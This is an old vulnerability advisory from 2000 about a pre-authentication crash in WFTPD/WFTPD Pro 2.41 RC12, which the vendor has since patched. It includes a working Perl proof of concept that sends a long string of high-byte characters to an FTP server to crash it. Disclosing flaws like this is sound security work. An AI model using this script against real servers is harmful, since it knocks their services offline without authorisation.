|
|
Home : Advisories : Blue Panda Vulnerability Announcement: WFTPD/WFTPD Pro 2.41 RC12
| Title: |
Blue Panda Vulnerability Announcement: WFTPD/WFTPD Pro 2.41 RC12 |
| Released by: |
Blue Panda |
| Date: |
5th September 2000 |
| Printable version: |
Click here |
=================================================================
Blue Panda Vulnerability Announcement: WFTPD/WFTPD Pro 2.41 RC12
05/09/2000 (dd/mm/yyyy)
bluepanda@dwarf.box.sk
http://bluepanda.box.sk/
=================================================================
Problem: WFTPD will crash if a large string consisting of characters 128-255
is received. A valid user/pass combination is not required to take advantage
of this flaw.
Vulnerable: WFTPD/WFTPD Pro 2.41 RC12 and prior.
Immune: WFTPD/WFTPD Pro 2.41 RC13.
Vendor status: Notified. A fix has been released.
===================
Proof of concept:
===================
#!/usr/bin/perl
#
# WFTPD/WFTPD Pro 2.41 RC12 denial-of-service
# Blue Panda - bluepanda@dwarf.box.sk
# http://bluepanda.box.sk/
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
# Sends WFTPD string consisting of characters > 127, causing it to crash.
#
use IO::Socket;
$host = "ftp.host.com" ;
$port = "21";
$sleepfor = 4;
print "Connecting to $host:$port...";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "failed.\n";
print "done.\n";
$buffer = "\x80" x 2000;
print $socket "$buffer\n";
$counter = 0;
print "Sleeping for $sleepfor seconds.";
while($counter < $sleepfor) {
sleep(1);
print ".";
$counter += 1;
}
print "\n";
close($socket);
|
